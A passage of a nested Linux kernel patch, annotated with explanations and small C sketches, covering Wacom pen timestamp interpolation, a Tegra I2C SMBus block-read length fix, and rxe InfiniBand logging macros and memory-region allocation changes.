+ 			}
+ 		}
++
+ 		if (wacom->tool[0]) {
+ 			input_report_abs(pen_input, ABS_PRESSURE, get_unaligned_le16(&frame[5]));
+ 			if (wacom->features.type == INTUOSP2_BT ||
+@@ -1405,6 +1428,9 @@ static void wacom_intuos_pro2_bt_pen(struct wacom_wac *wacom)
+ 
+ 		wacom->shared->stylus_in_proximity = prox;
+ 
++		/* add timestamp to unpack the frames */
++		input_set_timestamp(pen_input, event_timestamp);
++
+ 		input_sync(pen_input);
+ 	}
+ }
+@@ -1895,6 +1921,7 @@ static void wacom_map_usage(struct input_dev *input, struct hid_usage *usage,
+ 	int fmax = field->logical_maximum;
+ 	unsigned int equivalent_usage = wacom_equivalent_usage(usage->hid);
+ 	int resolution_code = code;
++	int resolution = hidinput_calc_abs_res(field, resolution_code);
+ 
+ 	if (equivalent_usage == HID_DG_TWIST) {
+ 		resolution_code = ABS_RZ;
+@@ -1915,8 +1942,15 @@ static void wacom_map_usage(struct input_dev *input, struct hid_usage *usage,
+ 	switch (type) {
+ 	case EV_ABS:
+ 		input_set_abs_params(input, code, fmin, fmax, fuzz, 0);
+-		input_abs_set_res(input, code,
+-				  hidinput_calc_abs_res(field, resolution_code));
++
++		/* older tablets may be missing the physical usage */
++		if ((code == ABS_X || code == ABS_Y) && !resolution) {
++			resolution = WACOM_INTUOS_RES;
++			hid_warn(input,
++				 "Wacom usage (%d) missing resolution\n",
++				 code);
++		}
++		input_abs_set_res(input, code, resolution);
+ 		break;
+ 	case EV_KEY:
+ 	case EV_MSC:
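
The Wacom change spreads timestamps across the pen frames batched in one Bluetooth packet: the interval since the previous packet is divided by the number of valid frames, and each frame is back-dated from the packet arrival time (falling back to 15 ms when there is no previous packet). The arithmetic, with illustrative values:

/* Timestamp-interpolation sketch: times in ns, three valid frames spread
 * evenly over the 45 ms since the previous packet. */
#include <stdio.h>

int main(void)
{
	long long prev_packet = 1000000000;	/* last packet arrival */
	long long now         = 1045000000;	/* this packet arrival */
	int valid_frames = 3;
	long long interval = valid_frames ?
		(now - prev_packet) / valid_frames : 15000000;
	int i;

	for (i = 0; i < valid_frames; i++) {
		int frames_from_end = valid_frames - i - 1;
		long long ts = now - frames_from_end * interval;

		printf("frame %d timestamp %lld ns\n", i, ts);
	}
	return 0;
}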
+diff --git a/drivers/hid/wacom_wac.h b/drivers/hid/wacom_wac.h
+index 16f221388563d..1a40bb8c5810c 100644
+--- a/drivers/hid/wacom_wac.h
++++ b/drivers/hid/wacom_wac.h
+@@ -324,6 +324,7 @@ struct hid_data {
+ 	int ps_connected;
+ 	bool pad_input_event_flag;
+ 	unsigned short sequence_number;
++	int time_delayed;
+ };
+ 
+ struct wacom_remote_data {
+diff --git a/drivers/i2c/busses/i2c-tegra.c b/drivers/i2c/busses/i2c-tegra.c
+index 6aab84c8d22b4..157066f06a32d 100644
+--- a/drivers/i2c/busses/i2c-tegra.c
++++ b/drivers/i2c/busses/i2c-tegra.c
+@@ -242,9 +242,10 @@ struct tegra_i2c_hw_feature {
+  * @is_dvc: identifies the DVC I2C controller, has a different register layout
+  * @is_vi: identifies the VI I2C controller, has a different register layout
+  * @msg_complete: transfer completion notifier
++ * @msg_buf_remaining: size of unsent data in the message buffer
++ * @msg_len: length of message in current transfer
+  * @msg_err: error code for completed message
+  * @msg_buf: pointer to current message data
+- * @msg_buf_remaining: size of unsent data in the message buffer
+  * @msg_read: indicates that the transfer is a read access
+  * @timings: i2c timings information like bus frequency
+  * @multimaster_mode: indicates that I2C controller is in multi-master mode
+@@ -277,6 +278,7 @@ struct tegra_i2c_dev {
+ 
+ 	struct completion msg_complete;
+ 	size_t msg_buf_remaining;
++	unsigned int msg_len;
+ 	int msg_err;
+ 	u8 *msg_buf;
+ 
+@@ -1169,7 +1171,7 @@ static void tegra_i2c_push_packet_header(struct tegra_i2c_dev *i2c_dev,
+ 	else
+ 		i2c_writel(i2c_dev, packet_header, I2C_TX_FIFO);
+ 
+-	packet_header = msg->len - 1;
++	packet_header = i2c_dev->msg_len - 1;
+ 
+ 	if (i2c_dev->dma_mode && !i2c_dev->msg_read)
+ 		*dma_buf++ = packet_header;
+@@ -1242,20 +1244,32 @@ static int tegra_i2c_xfer_msg(struct tegra_i2c_dev *i2c_dev,
+ 		return err;
+ 
+ 	i2c_dev->msg_buf = msg->buf;
++	i2c_dev->msg_len = msg->len;
+ 
+-	/* The condition true implies smbus block read and len is already read */
+-	if (msg->flags & I2C_M_RECV_LEN && end_state != MSG_END_CONTINUE)
+-		i2c_dev->msg_buf = msg->buf + 1;
+-
+-	i2c_dev->msg_buf_remaining = msg->len;
+ 	i2c_dev->msg_err = I2C_ERR_NONE;
+ 	i2c_dev->msg_read = !!(msg->flags & I2C_M_RD);
+ 	reinit_completion(&i2c_dev->msg_complete);
+ 
++	/*
++	 * For an SMBus block read command, read only 1 byte (the length) in
++	 * the first transfer. Account for that byte in the msg buffer and msg
++	 * length for the follow-up transfer.
++	 */
++	if (msg->flags & I2C_M_RECV_LEN) {
++		if (end_state == MSG_END_CONTINUE) {
++			i2c_dev->msg_len = 1;
++		} else {
++			i2c_dev->msg_buf += 1;
++			i2c_dev->msg_len -= 1;
++		}
++	}
++
++	i2c_dev->msg_buf_remaining = i2c_dev->msg_len;
++
+ 	if (i2c_dev->msg_read)
+-		xfer_size = msg->len;
++		xfer_size = i2c_dev->msg_len;
+ 	else
+-		xfer_size = msg->len + I2C_PACKET_HEADER_SIZE;
++		xfer_size = i2c_dev->msg_len + I2C_PACKET_HEADER_SIZE;
+ 
+ 	xfer_size = ALIGN(xfer_size, BYTES_PER_FIFO_WORD);
+ 
+@@ -1295,7 +1309,7 @@ static int tegra_i2c_xfer_msg(struct tegra_i2c_dev *i2c_dev,
+ 	if (!i2c_dev->msg_read) {
+ 		if (i2c_dev->dma_mode) {
+ 			memcpy(i2c_dev->dma_buf + I2C_PACKET_HEADER_SIZE,
+-			       msg->buf, msg->len);
++			       msg->buf, i2c_dev->msg_len);
+ 
+ 			dma_sync_single_for_device(i2c_dev->dma_dev,
+ 						   i2c_dev->dma_phys,
+@@ -1352,7 +1366,7 @@ static int tegra_i2c_xfer_msg(struct tegra_i2c_dev *i2c_dev,
+ 						i2c_dev->dma_phys,
+ 						xfer_size, DMA_FROM_DEVICE);
+ 
+-			memcpy(i2c_dev->msg_buf, i2c_dev->dma_buf, msg->len);
++			memcpy(i2c_dev->msg_buf, i2c_dev->dma_buf, i2c_dev->msg_len);
+ 		}
+ 	}
+ 
+@@ -1408,8 +1422,8 @@ static int tegra_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msgs[],
+ 			ret = tegra_i2c_xfer_msg(i2c_dev, &msgs[i], MSG_END_CONTINUE);
+ 			if (ret)
+ 				break;
+-			/* Set the read byte as msg len */
+-			msgs[i].len = msgs[i].buf[0];
++			/* Set the msg length from the first byte */
++			msgs[i].len += msgs[i].buf[0];
+ 			dev_dbg(i2c_dev->dev, "reading %d bytes\n", msgs[i].len);
+ 		}
+ 		ret = tegra_i2c_xfer_msg(i2c_dev, &msgs[i], end_type);
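
For SMBus block reads the Tegra driver now tracks msg_len separately: the first transfer fetches only the 1-byte count, the follow-up transfer reads that many bytes starting at buf[1], and the final message length becomes the original 1 plus the count (msgs[i].len += msgs[i].buf[0]) instead of being overwritten. A sketch of that accounting with stand-in transfer functions:

/* SMBus block-read accounting sketch: the count byte occupies buf[0] and
 * is included in the final length. */
#include <stdio.h>
#include <string.h>

struct msg { unsigned char buf[34]; int len; };

static void xfer_first(struct msg *m)		/* reads the count byte */
{
	m->buf[0] = 4;				/* device says: 4 data bytes */
}

static void xfer_rest(struct msg *m)		/* reads buf[0] data bytes */
{
	memcpy(&m->buf[1], "data", m->buf[0]);	/* lands after the count */
}

int main(void)
{
	struct msg m = { .len = 1 };		/* I2C_M_RECV_LEN starts at 1 */

	xfer_first(&m);
	m.len += m.buf[0];			/* 1 + count, not just count */
	xfer_rest(&m);
	printf("len=%d payload=%.4s\n", m.len, (char *)&m.buf[1]);
	return 0;
}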
+diff --git a/drivers/infiniband/sw/rxe/rxe.c b/drivers/infiniband/sw/rxe/rxe.c
+index a3f05fdd9fac2..7a7e713de52db 100644
+--- a/drivers/infiniband/sw/rxe/rxe.c
++++ b/drivers/infiniband/sw/rxe/rxe.c
+@@ -160,6 +160,8 @@ void rxe_set_mtu(struct rxe_dev *rxe, unsigned int ndev_mtu)
+ 
+ 	port->attr.active_mtu = mtu;
+ 	port->mtu_cap = ib_mtu_enum_to_int(mtu);
++
++	rxe_info_dev(rxe, "Set mtu to %d", port->mtu_cap);
+ }
+ 
+ /* called by ifc layer to create new rxe device.
+@@ -179,7 +181,7 @@ static int rxe_newlink(const char *ibdev_name, struct net_device *ndev)
+ 	int err = 0;
+ 
+ 	if (is_vlan_dev(ndev)) {
+-		pr_err("rxe creation allowed on top of a real device only\n");
++		rxe_err("rxe creation allowed on top of a real device only");
+ 		err = -EPERM;
+ 		goto err;
+ 	}
+@@ -187,14 +189,14 @@ static int rxe_newlink(const char *ibdev_name, struct net_device *ndev)
+ 	rxe = rxe_get_dev_from_net(ndev);
+ 	if (rxe) {
+ 		ib_device_put(&rxe->ib_dev);
+-		rxe_dbg(rxe, "already configured on %s\n", ndev->name);
++		rxe_err_dev(rxe, "already configured on %s", ndev->name);
+ 		err = -EEXIST;
+ 		goto err;
+ 	}
+ 
+ 	err = rxe_net_add(ibdev_name, ndev);
+ 	if (err) {
+-		pr_debug("failed to add %s\n", ndev->name);
++		rxe_err("failed to add %s\n", ndev->name);
+ 		goto err;
+ 	}
+ err:
+diff --git a/drivers/infiniband/sw/rxe/rxe.h b/drivers/infiniband/sw/rxe/rxe.h
+index 2415f3704f576..bd8a8ea4ea8fd 100644
+--- a/drivers/infiniband/sw/rxe/rxe.h
++++ b/drivers/infiniband/sw/rxe/rxe.h
+@@ -38,7 +38,8 @@
+ 
+ #define RXE_ROCE_V2_SPORT		(0xc000)
+ 
+-#define rxe_dbg(rxe, fmt, ...) ibdev_dbg(&(rxe)->ib_dev,		\
++#define rxe_dbg(fmt, ...) pr_debug("%s: " fmt "\n", __func__, ##__VA_ARGS__)
++#define rxe_dbg_dev(rxe, fmt, ...) ibdev_dbg(&(rxe)->ib_dev,		\
+ 		"%s: " fmt, __func__, ##__VA_ARGS__)
+ #define rxe_dbg_uc(uc, fmt, ...) ibdev_dbg((uc)->ibuc.device,		\
+ 		"uc#%d %s: " fmt, (uc)->elem.index, __func__, ##__VA_ARGS__)
+@@ -57,6 +58,48 @@
+ #define rxe_dbg_mw(mw, fmt, ...) ibdev_dbg((mw)->ibmw.device,		\
+ 		"mw#%d %s:  " fmt, (mw)->elem.index, __func__, ##__VA_ARGS__)
+ 
++#define rxe_err(fmt, ...) pr_err_ratelimited("%s: " fmt "\n", __func__, \
++					##__VA_ARGS__)
++#define rxe_err_dev(rxe, fmt, ...) ibdev_err_ratelimited(&(rxe)->ib_dev, \
++		"%s: " fmt, __func__, ##__VA_ARGS__)
++#define rxe_err_uc(uc, fmt, ...) ibdev_err_ratelimited((uc)->ibuc.device, \
++		"uc#%d %s: " fmt, (uc)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_err_pd(pd, fmt, ...) ibdev_err_ratelimited((pd)->ibpd.device, \
++		"pd#%d %s: " fmt, (pd)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_err_ah(ah, fmt, ...) ibdev_err_ratelimited((ah)->ibah.device, \
++		"ah#%d %s: " fmt, (ah)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_err_srq(srq, fmt, ...) ibdev_err_ratelimited((srq)->ibsrq.device, \
++		"srq#%d %s: " fmt, (srq)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_err_qp(qp, fmt, ...) ibdev_err_ratelimited((qp)->ibqp.device, \
++		"qp#%d %s: " fmt, (qp)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_err_cq(cq, fmt, ...) ibdev_err_ratelimited((cq)->ibcq.device, \
++		"cq#%d %s: " fmt, (cq)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_err_mr(mr, fmt, ...) ibdev_err_ratelimited((mr)->ibmr.device, \
++		"mr#%d %s:  " fmt, (mr)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_err_mw(mw, fmt, ...) ibdev_err_ratelimited((mw)->ibmw.device, \
++		"mw#%d %s:  " fmt, (mw)->elem.index, __func__, ##__VA_ARGS__)
++
++#define rxe_info(fmt, ...) pr_info_ratelimited("%s: " fmt "\n", __func__, \
++					##__VA_ARGS__)
++#define rxe_info_dev(rxe, fmt, ...) ibdev_info_ratelimited(&(rxe)->ib_dev, \
++		"%s: " fmt, __func__, ##__VA_ARGS__)
++#define rxe_info_uc(uc, fmt, ...) ibdev_info_ratelimited((uc)->ibuc.device, \
++		"uc#%d %s: " fmt, (uc)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_info_pd(pd, fmt, ...) ibdev_info_ratelimited((pd)->ibpd.device, \
++		"pd#%d %s: " fmt, (pd)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_info_ah(ah, fmt, ...) ibdev_info_ratelimited((ah)->ibah.device, \
++		"ah#%d %s: " fmt, (ah)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_info_srq(srq, fmt, ...) ibdev_info_ratelimited((srq)->ibsrq.device, \
++		"srq#%d %s: " fmt, (srq)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_info_qp(qp, fmt, ...) ibdev_info_ratelimited((qp)->ibqp.device, \
++		"qp#%d %s: " fmt, (qp)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_info_cq(cq, fmt, ...) ibdev_info_ratelimited((cq)->ibcq.device, \
++		"cq#%d %s: " fmt, (cq)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_info_mr(mr, fmt, ...) ibdev_info_ratelimited((mr)->ibmr.device, \
++		"mr#%d %s:  " fmt, (mr)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_info_mw(mw, fmt, ...) ibdev_info_ratelimited((mw)->ibmw.device, \
++		"mw#%d %s:  " fmt, (mw)->elem.index, __func__, ##__VA_ARGS__)
++
+ /* responder states */
+ enum resp_states {
+ 	RESPST_NONE,
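
Every rxe_err_* and rxe_info_* macro added above follows one shape: a variadic wrapper that prefixes the message with the object's index and __func__ so call sites stay one line. A small standalone C illustration of the pattern; log_qp and the plain fprintf are invented stand-ins for the ratelimited ibdev helpers.

#include <stdio.h>

/* One-line call sites via a variadic wrapper macro, as in the
 * rxe_err and rxe_info macro families added above. */
struct qp {
	int index;
};

#define log_qp(qp, fmt, ...) \
	fprintf(stderr, "qp#%d %s: " fmt "\n", \
		(qp)->index, __func__, ##__VA_ARGS__)

static void modify_qp(struct qp *qp, int state)
{
	if (state < 0)
		log_qp(qp, "invalid state %d", state);
}

int main(void)
{
	struct qp qp = { .index = 7 };

	modify_qp(&qp, -1);	/* prints: qp#7 modify_qp: invalid state -1 */
	return 0;
}
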
+diff --git a/drivers/infiniband/sw/rxe/rxe_cq.c b/drivers/infiniband/sw/rxe/rxe_cq.c
+index faf49c50bbaba..519ddec29b4ba 100644
+--- a/drivers/infiniband/sw/rxe/rxe_cq.c
++++ b/drivers/infiniband/sw/rxe/rxe_cq.c
+@@ -14,12 +14,12 @@ int rxe_cq_chk_attr(struct rxe_dev *rxe, struct rxe_cq *cq,
+ 	int count;
+ 
+ 	if (cqe <= 0) {
+-		rxe_dbg(rxe, "cqe(%d) <= 0\n", cqe);
++		rxe_dbg_dev(rxe, "cqe(%d) <= 0\n", cqe);
+ 		goto err1;
+ 	}
+ 
+ 	if (cqe > rxe->attr.max_cqe) {
+-		rxe_dbg(rxe, "cqe(%d) > max_cqe(%d)\n",
++		rxe_dbg_dev(rxe, "cqe(%d) > max_cqe(%d)\n",
+ 				cqe, rxe->attr.max_cqe);
+ 		goto err1;
+ 	}
+@@ -50,7 +50,7 @@ int rxe_cq_from_init(struct rxe_dev *rxe, struct rxe_cq *cq, int cqe,
+ 	cq->queue = rxe_queue_init(rxe, &cqe,
+ 			sizeof(struct rxe_cqe), type);
+ 	if (!cq->queue) {
+-		rxe_dbg(rxe, "unable to create cq\n");
++		rxe_dbg_dev(rxe, "unable to create cq\n");
+ 		return -ENOMEM;
+ 	}
+ 
+diff --git a/drivers/infiniband/sw/rxe/rxe_icrc.c b/drivers/infiniband/sw/rxe/rxe_icrc.c
+index 71bc2c1895888..fdf5f08cd8f17 100644
+--- a/drivers/infiniband/sw/rxe/rxe_icrc.c
++++ b/drivers/infiniband/sw/rxe/rxe_icrc.c
+@@ -21,7 +21,7 @@ int rxe_icrc_init(struct rxe_dev *rxe)
+ 
+ 	tfm = crypto_alloc_shash("crc32", 0, 0);
+ 	if (IS_ERR(tfm)) {
+-		rxe_dbg(rxe, "failed to init crc32 algorithm err: %ld\n",
++		rxe_dbg_dev(rxe, "failed to init crc32 algorithm err: %ld\n",
+ 			       PTR_ERR(tfm));
+ 		return PTR_ERR(tfm);
+ 	}
+@@ -51,7 +51,7 @@ static __be32 rxe_crc32(struct rxe_dev *rxe, __be32 crc, void *next, size_t len)
+ 	*(__be32 *)shash_desc_ctx(shash) = crc;
+ 	err = crypto_shash_update(shash, next, len);
+ 	if (unlikely(err)) {
+-		rxe_dbg(rxe, "failed crc calculation, err: %d\n", err);
++		rxe_dbg_dev(rxe, "failed crc calculation, err: %d\n", err);
+ 		return (__force __be32)crc32_le((__force u32)crc, next, len);
+ 	}
+ 
+diff --git a/drivers/infiniband/sw/rxe/rxe_mmap.c b/drivers/infiniband/sw/rxe/rxe_mmap.c
+index a47d72dbc5376..6b7f2bd698799 100644
+--- a/drivers/infiniband/sw/rxe/rxe_mmap.c
++++ b/drivers/infiniband/sw/rxe/rxe_mmap.c
+@@ -79,7 +79,7 @@ int rxe_mmap(struct ib_ucontext *context, struct vm_area_struct *vma)
+ 
+ 		/* Don't allow a mmap larger than the object. */
+ 		if (size > ip->info.size) {
+-			rxe_dbg(rxe, "mmap region is larger than the object!\n");
++			rxe_dbg_dev(rxe, "mmap region is larger than the object!\n");
+ 			spin_unlock_bh(&rxe->pending_lock);
+ 			ret = -EINVAL;
+ 			goto done;
+@@ -87,7 +87,7 @@ int rxe_mmap(struct ib_ucontext *context, struct vm_area_struct *vma)
+ 
+ 		goto found_it;
+ 	}
+-	rxe_dbg(rxe, "unable to find pending mmap info\n");
++	rxe_dbg_dev(rxe, "unable to find pending mmap info\n");
+ 	spin_unlock_bh(&rxe->pending_lock);
+ 	ret = -EINVAL;
+ 	goto done;
+@@ -98,7 +98,7 @@ found_it:
+ 
+ 	ret = remap_vmalloc_range(vma, ip->obj, 0);
+ 	if (ret) {
+-		rxe_dbg(rxe, "err %d from remap_vmalloc_range\n", ret);
++		rxe_dbg_dev(rxe, "err %d from remap_vmalloc_range\n", ret);
+ 		goto done;
+ 	}
+ 
+diff --git a/drivers/infiniband/sw/rxe/rxe_mr.c b/drivers/infiniband/sw/rxe/rxe_mr.c
+index 5e9a03831bf9f..b10aa1580a644 100644
+--- a/drivers/infiniband/sw/rxe/rxe_mr.c
++++ b/drivers/infiniband/sw/rxe/rxe_mr.c
+@@ -731,7 +731,7 @@ int rxe_dereg_mr(struct ib_mr *ibmr, struct ib_udata *udata)
+ 		return -EINVAL;
+ 
+ 	rxe_cleanup(mr);
+-
++	kfree_rcu(mr);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/infiniband/sw/rxe/rxe_net.c b/drivers/infiniband/sw/rxe/rxe_net.c
+index e02e1624bcf4d..a2ace42e95366 100644
+--- a/drivers/infiniband/sw/rxe/rxe_net.c
++++ b/drivers/infiniband/sw/rxe/rxe_net.c
+@@ -596,7 +596,7 @@ static int rxe_notify(struct notifier_block *not_blk,
+ 		rxe_port_down(rxe);
+ 		break;
+ 	case NETDEV_CHANGEMTU:
+-		rxe_dbg(rxe, "%s changed mtu to %d\n", ndev->name, ndev->mtu);
++		rxe_dbg_dev(rxe, "%s changed mtu to %d\n", ndev->name, ndev->mtu);
+ 		rxe_set_mtu(rxe, ndev->mtu);
+ 		break;
+ 	case NETDEV_CHANGE:
+@@ -608,7 +608,7 @@ static int rxe_notify(struct notifier_block *not_blk,
+ 	case NETDEV_CHANGENAME:
+ 	case NETDEV_FEAT_CHANGE:
+ 	default:
+-		rxe_dbg(rxe, "ignoring netdev event = %ld for %s\n",
++		rxe_dbg_dev(rxe, "ignoring netdev event = %ld for %s\n",
+ 			event, ndev->name);
+ 		break;
+ 	}
+diff --git a/drivers/infiniband/sw/rxe/rxe_pool.c b/drivers/infiniband/sw/rxe/rxe_pool.c
+index 1151c0b5cceab..6215c6de3a840 100644
+--- a/drivers/infiniband/sw/rxe/rxe_pool.c
++++ b/drivers/infiniband/sw/rxe/rxe_pool.c
+@@ -116,55 +116,12 @@ void rxe_pool_cleanup(struct rxe_pool *pool)
+ 	WARN_ON(!xa_empty(&pool->xa));
+ }
+ 
+-void *rxe_alloc(struct rxe_pool *pool)
+-{
+-	struct rxe_pool_elem *elem;
+-	void *obj;
+-	int err;
+-
+-	if (WARN_ON(!(pool->type == RXE_TYPE_MR)))
+-		return NULL;
+-
+-	if (atomic_inc_return(&pool->num_elem) > pool->max_elem)
+-		goto err_cnt;
+-
+-	obj = kzalloc(pool->elem_size, GFP_KERNEL);
+-	if (!obj)
+-		goto err_cnt;
+-
+-	elem = (struct rxe_pool_elem *)((u8 *)obj + pool->elem_offset);
+-
+-	elem->pool = pool;
+-	elem->obj = obj;
+-	kref_init(&elem->ref_cnt);
+-	init_completion(&elem->complete);
+-
+-	/* allocate index in array but leave pointer as NULL so it
+-	 * can't be looked up until rxe_finalize() is called
+-	 */
+-	err = xa_alloc_cyclic(&pool->xa, &elem->index, NULL, pool->limit,
+-			      &pool->next, GFP_KERNEL);
+-	if (err < 0)
+-		goto err_free;
+-
+-	return obj;
+-
+-err_free:
+-	kfree(obj);
+-err_cnt:
+-	atomic_dec(&pool->num_elem);
+-	return NULL;
+-}
+-
+ int __rxe_add_to_pool(struct rxe_pool *pool, struct rxe_pool_elem *elem,
+ 				bool sleepable)
+ {
+ 	int err;
+ 	gfp_t gfp_flags;
+ 
+-	if (WARN_ON(pool->type == RXE_TYPE_MR))
+-		return -EINVAL;
+-
+ 	if (atomic_inc_return(&pool->num_elem) > pool->max_elem)
+ 		goto err_cnt;
+ 
+@@ -275,9 +232,6 @@ int __rxe_cleanup(struct rxe_pool_elem *elem, bool sleepable)
+ 	if (pool->cleanup)
+ 		pool->cleanup(elem);
+ 
+-	if (pool->type == RXE_TYPE_MR)
+-		kfree_rcu(elem->obj);
+-
+ 	atomic_dec(&pool->num_elem);
+ 
+ 	return err;
+diff --git a/drivers/infiniband/sw/rxe/rxe_pool.h b/drivers/infiniband/sw/rxe/rxe_pool.h
+index 9d83cb32092ff..b42e26427a702 100644
+--- a/drivers/infiniband/sw/rxe/rxe_pool.h
++++ b/drivers/infiniband/sw/rxe/rxe_pool.h
+@@ -54,9 +54,6 @@ void rxe_pool_init(struct rxe_dev *rxe, struct rxe_pool *pool,
+ /* free resources from object pool */
+ void rxe_pool_cleanup(struct rxe_pool *pool);
+ 
+-/* allocate an object from pool */
+-void *rxe_alloc(struct rxe_pool *pool);
+-
+ /* connect already allocated object to pool */
+ int __rxe_add_to_pool(struct rxe_pool *pool, struct rxe_pool_elem *elem,
+ 				bool sleepable);
+diff --git a/drivers/infiniband/sw/rxe/rxe_qp.c b/drivers/infiniband/sw/rxe/rxe_qp.c
+index 13283ec06f95e..d5de5ba6940f1 100644
+--- a/drivers/infiniband/sw/rxe/rxe_qp.c
++++ b/drivers/infiniband/sw/rxe/rxe_qp.c
+@@ -19,33 +19,33 @@ static int rxe_qp_chk_cap(struct rxe_dev *rxe, struct ib_qp_cap *cap,
+ 			  int has_srq)
+ {
+ 	if (cap->max_send_wr > rxe->attr.max_qp_wr) {
+-		rxe_dbg(rxe, "invalid send wr = %u > %d\n",
++		rxe_dbg_dev(rxe, "invalid send wr = %u > %d\n",
+ 			 cap->max_send_wr, rxe->attr.max_qp_wr);
+ 		goto err1;
+ 	}
+ 
+ 	if (cap->max_send_sge > rxe->attr.max_send_sge) {
+-		rxe_dbg(rxe, "invalid send sge = %u > %d\n",
++		rxe_dbg_dev(rxe, "invalid send sge = %u > %d\n",
+ 			 cap->max_send_sge, rxe->attr.max_send_sge);
+ 		goto err1;
+ 	}
+ 
+ 	if (!has_srq) {
+ 		if (cap->max_recv_wr > rxe->attr.max_qp_wr) {
+-			rxe_dbg(rxe, "invalid recv wr = %u > %d\n",
++			rxe_dbg_dev(rxe, "invalid recv wr = %u > %d\n",
+ 				 cap->max_recv_wr, rxe->attr.max_qp_wr);
+ 			goto err1;
+ 		}
+ 
+ 		if (cap->max_recv_sge > rxe->attr.max_recv_sge) {
+-			rxe_dbg(rxe, "invalid recv sge = %u > %d\n",
++			rxe_dbg_dev(rxe, "invalid recv sge = %u > %d\n",
+ 				 cap->max_recv_sge, rxe->attr.max_recv_sge);
+ 			goto err1;
+ 		}
+ 	}
+ 
+ 	if (cap->max_inline_data > rxe->max_inline_data) {
+-		rxe_dbg(rxe, "invalid max inline data = %u > %d\n",
++		rxe_dbg_dev(rxe, "invalid max inline data = %u > %d\n",
+ 			 cap->max_inline_data, rxe->max_inline_data);
+ 		goto err1;
+ 	}
+@@ -73,7 +73,7 @@ int rxe_qp_chk_init(struct rxe_dev *rxe, struct ib_qp_init_attr *init)
+ 	}
+ 
+ 	if (!init->recv_cq || !init->send_cq) {
+-		rxe_dbg(rxe, "missing cq\n");
++		rxe_dbg_dev(rxe, "missing cq\n");
+ 		goto err1;
+ 	}
+ 
+@@ -82,14 +82,14 @@ int rxe_qp_chk_init(struct rxe_dev *rxe, struct ib_qp_init_attr *init)
+ 
+ 	if (init->qp_type == IB_QPT_GSI) {
+ 		if (!rdma_is_port_valid(&rxe->ib_dev, port_num)) {
+-			rxe_dbg(rxe, "invalid port = %d\n", port_num);
++			rxe_dbg_dev(rxe, "invalid port = %d\n", port_num);
+ 			goto err1;
+ 		}
+ 
+ 		port = &rxe->port;
+ 
+ 		if (init->qp_type == IB_QPT_GSI && port->qp_gsi_index) {
+-			rxe_dbg(rxe, "GSI QP exists for port %d\n", port_num);
++			rxe_dbg_dev(rxe, "GSI QP exists for port %d\n", port_num);
+ 			goto err1;
+ 		}
+ 	}
+diff --git a/drivers/infiniband/sw/rxe/rxe_srq.c b/drivers/infiniband/sw/rxe/rxe_srq.c
+index 82e37a41ced40..27ca82ec0826b 100644
+--- a/drivers/infiniband/sw/rxe/rxe_srq.c
++++ b/drivers/infiniband/sw/rxe/rxe_srq.c
+@@ -13,13 +13,13 @@ int rxe_srq_chk_init(struct rxe_dev *rxe, struct ib_srq_init_attr *init)
+ 	struct ib_srq_attr *attr = &init->attr;
+ 
+ 	if (attr->max_wr > rxe->attr.max_srq_wr) {
+-		rxe_dbg(rxe, "max_wr(%d) > max_srq_wr(%d)\n",
++		rxe_dbg_dev(rxe, "max_wr(%d) > max_srq_wr(%d)\n",
+ 			attr->max_wr, rxe->attr.max_srq_wr);
+ 		goto err1;
+ 	}
+ 
+ 	if (attr->max_wr <= 0) {
+-		rxe_dbg(rxe, "max_wr(%d) <= 0\n", attr->max_wr);
++		rxe_dbg_dev(rxe, "max_wr(%d) <= 0\n", attr->max_wr);
+ 		goto err1;
+ 	}
+ 
+@@ -27,7 +27,7 @@ int rxe_srq_chk_init(struct rxe_dev *rxe, struct ib_srq_init_attr *init)
+ 		attr->max_wr = RXE_MIN_SRQ_WR;
+ 
+ 	if (attr->max_sge > rxe->attr.max_srq_sge) {
+-		rxe_dbg(rxe, "max_sge(%d) > max_srq_sge(%d)\n",
++		rxe_dbg_dev(rxe, "max_sge(%d) > max_srq_sge(%d)\n",
+ 			attr->max_sge, rxe->attr.max_srq_sge);
+ 		goto err1;
+ 	}
+diff --git a/drivers/infiniband/sw/rxe/rxe_verbs.c b/drivers/infiniband/sw/rxe/rxe_verbs.c
+index 9ae7cf93365c7..a40a6d0581500 100644
+--- a/drivers/infiniband/sw/rxe/rxe_verbs.c
++++ b/drivers/infiniband/sw/rxe/rxe_verbs.c
+@@ -867,10 +867,17 @@ static struct ib_mr *rxe_get_dma_mr(struct ib_pd *ibpd, int access)
+ 	struct rxe_dev *rxe = to_rdev(ibpd->device);
+ 	struct rxe_pd *pd = to_rpd(ibpd);
+ 	struct rxe_mr *mr;
++	int err;
+ 
+-	mr = rxe_alloc(&rxe->mr_pool);
+-	if (!mr)
+-		return ERR_PTR(-ENOMEM);
++	mr = kzalloc(sizeof(*mr), GFP_KERNEL);
++	if (!mr) {
++		err = -ENOMEM;
++		goto err_out;
++	}
++
++	err = rxe_add_to_pool(&rxe->mr_pool, mr);
++	if (err)
++		goto err_free;
+ 
+ 	rxe_get(pd);
+ 	mr->ibmr.pd = ibpd;
+@@ -878,8 +885,12 @@ static struct ib_mr *rxe_get_dma_mr(struct ib_pd *ibpd, int access)
+ 
+ 	rxe_mr_init_dma(access, mr);
+ 	rxe_finalize(mr);
+-
+ 	return &mr->ibmr;
++
++err_free:
++	kfree(mr);
++err_out:
++	return ERR_PTR(err);
+ }
+ 
+ static struct ib_mr *rxe_reg_user_mr(struct ib_pd *ibpd,
+@@ -893,9 +904,15 @@ static struct ib_mr *rxe_reg_user_mr(struct ib_pd *ibpd,
+ 	struct rxe_pd *pd = to_rpd(ibpd);
+ 	struct rxe_mr *mr;
+ 
+-	mr = rxe_alloc(&rxe->mr_pool);
+-	if (!mr)
+-		return ERR_PTR(-ENOMEM);
++	mr = kzalloc(sizeof(*mr), GFP_KERNEL);
++	if (!mr) {
++		err = -ENOMEM;
++		goto err_out;
++	}
++
